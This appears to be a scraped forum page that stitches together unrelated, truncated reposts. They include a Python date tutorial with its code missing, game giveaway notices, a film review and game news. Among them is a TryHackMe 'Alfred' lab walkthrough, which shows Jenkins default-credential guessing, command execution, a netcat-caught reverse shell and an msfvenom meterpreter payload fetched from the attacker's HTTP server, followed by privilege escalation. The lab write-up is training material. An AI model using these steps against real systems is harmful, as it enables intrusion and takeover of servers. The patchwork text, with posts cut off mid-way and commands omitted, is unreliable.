Posted by: xSicKxBot - 12-29-2022, 09:17 AM - Forum: Python
- No Replies
Ten Python One-Liners to Get Today’s Date as YYYY-MM-DD
5/5 – (2 votes)
Mini Project Description
I was just working on the Finxter app that involves creating a huge amount of log files (for server logs at app.finxter.com). In my Python web app, I create these log files on a daily basis containing usage reports — and I needed to rename them so that I can sort them in a folder by date.
Examples with boldedYYYY-MM-DD date formatting:
'log-file-2022-12-21.dat'
'log-file-2022-12-22.dat'
'log-file-2022-12-23.dat'
Challenge: Specifically, I need to create the current date YYYY-MM-DD in Python!
In this short tutorial, I quickly share my code on how to do this so it may help you do the same or a similar task. Let’s get started!
Quick Solution
The datetime.date.today() function creates a datetime object with the current date that can be reformatted using the strftime('%Y-%m-%d') method call to print out the current date in a specific format (year-month-day).
Python One-Liners Book: Master the Single Line First!
Python programmers will improve their computer science skills with these useful one-liners.
Python One-Linerswill teach you how to read and write “one-liners”: concise statements of useful functionality packed into a single line of code. You’ll learn how to systematically unpack and understand any line of Python code, and write eloquent, powerfully compressed Python like an expert.
The book’s five chapters cover (1) tips and tricks, (2) regular expressions, (3) machine learning, (4) core data science topics, and (5) useful algorithms.
Detailed explanations of one-liners introduce key computer science concepts and boost your coding and analytical skills. You’ll learn about advanced Python features such as list comprehension, slicing, lambda functions, regular expressions, map and reduce functions, and slice assignments.
You’ll also learn how to:
Leverage data structures to solve real-world problems, like using Boolean indexing to find cities with above-average pollution
Use NumPy basics such as array, shape, axis, type, broadcasting, advanced indexing, slicing, sorting, searching, aggregating, and statistics
Calculate basic statistics of multidimensional data arrays and the K-Means algorithms for unsupervised learning
Create more advanced regular expressions using grouping and named groups, negative lookaheads, escaped characters, whitespaces, character sets (and negative characters sets), and greedy/nongreedy operators
Understand a wide range of computer science topics, including anagrams, palindromes, supersets, permutations, factorials, prime numbers, Fibonacci numbers, obfuscation, searching, and algorithmic sorting
By the end of the book, you’ll know how to write Python at its most refined, and create concise, beautiful pieces of “Python art” in merely a single line.
FIST Forged In Shadow Torch - Free Epic Games Game
F.I.S.T.: Forged In Shadow Torch - 24 hours only
To grab the game for free: - Go to the store page of F.I.S.T.: Forged In Shadow Torch - https://store.epicgames.com/p/fist-forged-in-shadow-torch - Click on the GET Button - Verify that the price is zero - Click on the Place Order Button - That's it, the game will be added to you Epic Games Account
This game is free to keep if claimed by December 27, 2022 5:00 PM or in a day
We are welcoming everyone to join our discord[discord.gg]. We are more active there on finding giveaways, small or large, and there are daily raffles you can participate.
Posted by: xSicKxBot - 12-29-2022, 09:17 AM - Forum: Lounge
- No Replies
GameSpot's Movie Of 2022: Everything, Everywhere, All At Once
One of the first big fight scenes in Everything, Everywhere, All At Once involves Ke Huy Quan slinging a fanny pack around like a meteor hammer inside an IRS building, and things only get weirder and more specific from there on out. In fact, about midway through, you realize very clearly that fanny pack-based combat is actually one of the most grounded things the movie has to offer. It follows it up with hot dog fingers, sentient rocks, a protracted Ratatouille joke, and improvised sex toy gags. Yet somehow, despite all of this (or maybe because of it) Everything Everywhere All At Once managed to stick the landing and run away with the title as GameSpot's Movie Of The Year for 2022.
It's strange to think that, in an era of endless big-budget Marvel blockbusters and nonstop franchise building, the idea of a "multiverse" has become as close to old hat as it's ever going to get. The idea itself has become less of a story building technique and more of a way for billion dollar companies to cram as much of their IP into a given release as they can--which, don't get us wrong, can make for some pretty fun opportunities to point at the screen and say "hey, I know what that's from!" But Everything Everywhere took that idea and turned it on its head, not by reinventing the multiversal wheel, but by using the trope itself to craft what amounts to an intimate, personal, and above all original story about a family of extraordinarily regular people.
Master of Magic is a combination of an RPG and a strategy game, a remake of a classic from the 90s.
In Master of Magic you take up the role of one of 14 unique and diverse great wizards who compete with each other to dominate the worlds of Arcanus and Myrror. Choose from different schools of magic and fantasy races to command, then lead your minions and expand your influence and power across the land.
Recruit and command mighty armies of elves, dragons, dwarves, orcs and many more. Support them with powerful spells. Fight tactical turn-based battles and affect the outcome with your magic.
Always beware of the machinations of your rival wizards, who seek to reach your same goals. But in the end, remember: there can be only one Master of Magic.
Follow OpenJDK on Twitter 2020 proved to be a memorable year for Java as we celebrated its 25th birthday. With over two decades of innovation, Java has continued to be: Flexible by adapting to the changing technology landscape while remaining platform independent. Reliable by retaining backwards com...
Posted by: xSicKxBot - 12-28-2022, 10:21 AM - Forum: Python
- No Replies
TryHackMe Alfred – How I Solved The Challenge [+Video]
5/5 – (1 vote)
In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of root on a Windows machine.
Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!
First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.
INITIAL ENUMERATION
IPs
export myIP=10.6.2.23
export targetIP=10.10.99.176 ┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
We see that there are three open ports.
There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser.
The ms-wbt-server running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol).
Also, the http-proxy on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.
HACKING JENKINS WITH BURPSUITE
On port 8080, we find a login page to Jenkins.
Let’s take a few guesses with some of the standard factory-set passwords: admin:password, admin:admin, etc.
Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack.
Based on the different lengths of the responses, we can see that admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with admin:admin.
At TryHackMe’s suggestion, we’ll use Nishang for spawning a revshell from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure.
In the last text box, we can perform remote command execution.
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD
First, let’s spawn a reverse shell using PowerShellTcp.ps1 from nishang’s git repo. After downloading the file from the git repo, we launch a Netcat listener with the command:
nc -lnvp 8888
Then we use the following command in the last text box on Jenkins project 1 settings.
We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe
Now we need to start up Metasploit console:
Msfconsole
Load the meterpreter exploit/multi/handler:
use exploit/multi/handler
Set up our payload:
set payload windows/meterpreter/reverse_tcp payload
And finally, type: run
First, we’ll spin up a simple HTTP server to copy shell.exe to windows with:
python -m http.server 8000
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:
And Metasploit successfully launches a new meterpreter session on the target box. If the shell.exe file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:
./shell.exe
PRIVILEGE ESCALATION TO ROOT
First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:
getsystem
We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine.
Entering the command “ps” will give us a list of processes. We’ll use the process system.exe with the following command:
migrate <PID> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case system.exe)
Now we are running metasploit in the RAM of our target machine on the system.exe process. We have full NT AUTHORITY/SYSTEM privileges and can easily find root.txt with the following command:
This is a good game, expect epic to go down and keep on trying, 24 hours only
It was the directors cut, they downgraded it
To grab the game for free: - Go to the store page of Death Stranding - https://store.epicgames.com/p/death-stranding - Click on the GET Button - Verify that the price is zero - Click on the Place Order Button - That's it, the game will be added to you Epic Games Account
This game is free to keep if claimed by December 26, 2022 5:00 PM or in a day
We are welcoming everyone to join our discord[discord.gg]. We are more active there on finding giveaways, small or large, and there are daily raffles you can participate.
Posted by: xSicKxBot - 12-28-2022, 10:20 AM - Forum: Lounge
- No Replies
Xbox Game Pass Losing 9 Games Soon, Including Outer Wilds
Despite no official announcement coming down from Microsoft as of yet, it looks like nine games are leaving Xbox Game Pass very soon, including the very good game The Outer Wilds.
Pure Xbox was first to notice that the official Game Pass app states that The Outer Wilds is listed under the "leaving soon" tab for console and PC. GameSpot has confirmed this as well. Other titles leaving the service soon, according to the app, will include Embr, Gorogoa, Iron Harvest, Immortal Realms: Vampire Wars, Scarlet Nexus, Secret Neighbor, The Pedestrian, and Tropico 6. Again, Microsoft has not made any official announcements about titles leaving Game Pass yet, so this is not yet completely confirmed. The titles are reportedly set for removal on December 31.
Microsoft typically adds and removes titles from the Game Pass library twice per month. As of yet, however, Microsoft has not announced a Wave 2 of additions and removals for December, despite there being fewer than two weeks left in the month.
CRISIS CORE -FINAL FANTASY VII- REUNION is a full remaster of the PlayStation Portable exclusive CRISIS CORE -FINAL FANTASY VII-, which originally launched back in 2007. CRISIS CORE -FINAL FANTASY VII- REUNION is a true remaster that follows the original's narrative: Zack Fair's mission to find the missing SOLDIER Genesis Rhapsodos. It features multiple improvements from the original game - for example, the graphics have been converted to HD, with all the 3D models, from the characters to everything else, being fully refreshed. What's more the dialogue is now fully voice-acted, and there's a new arrangement for the soundtrack!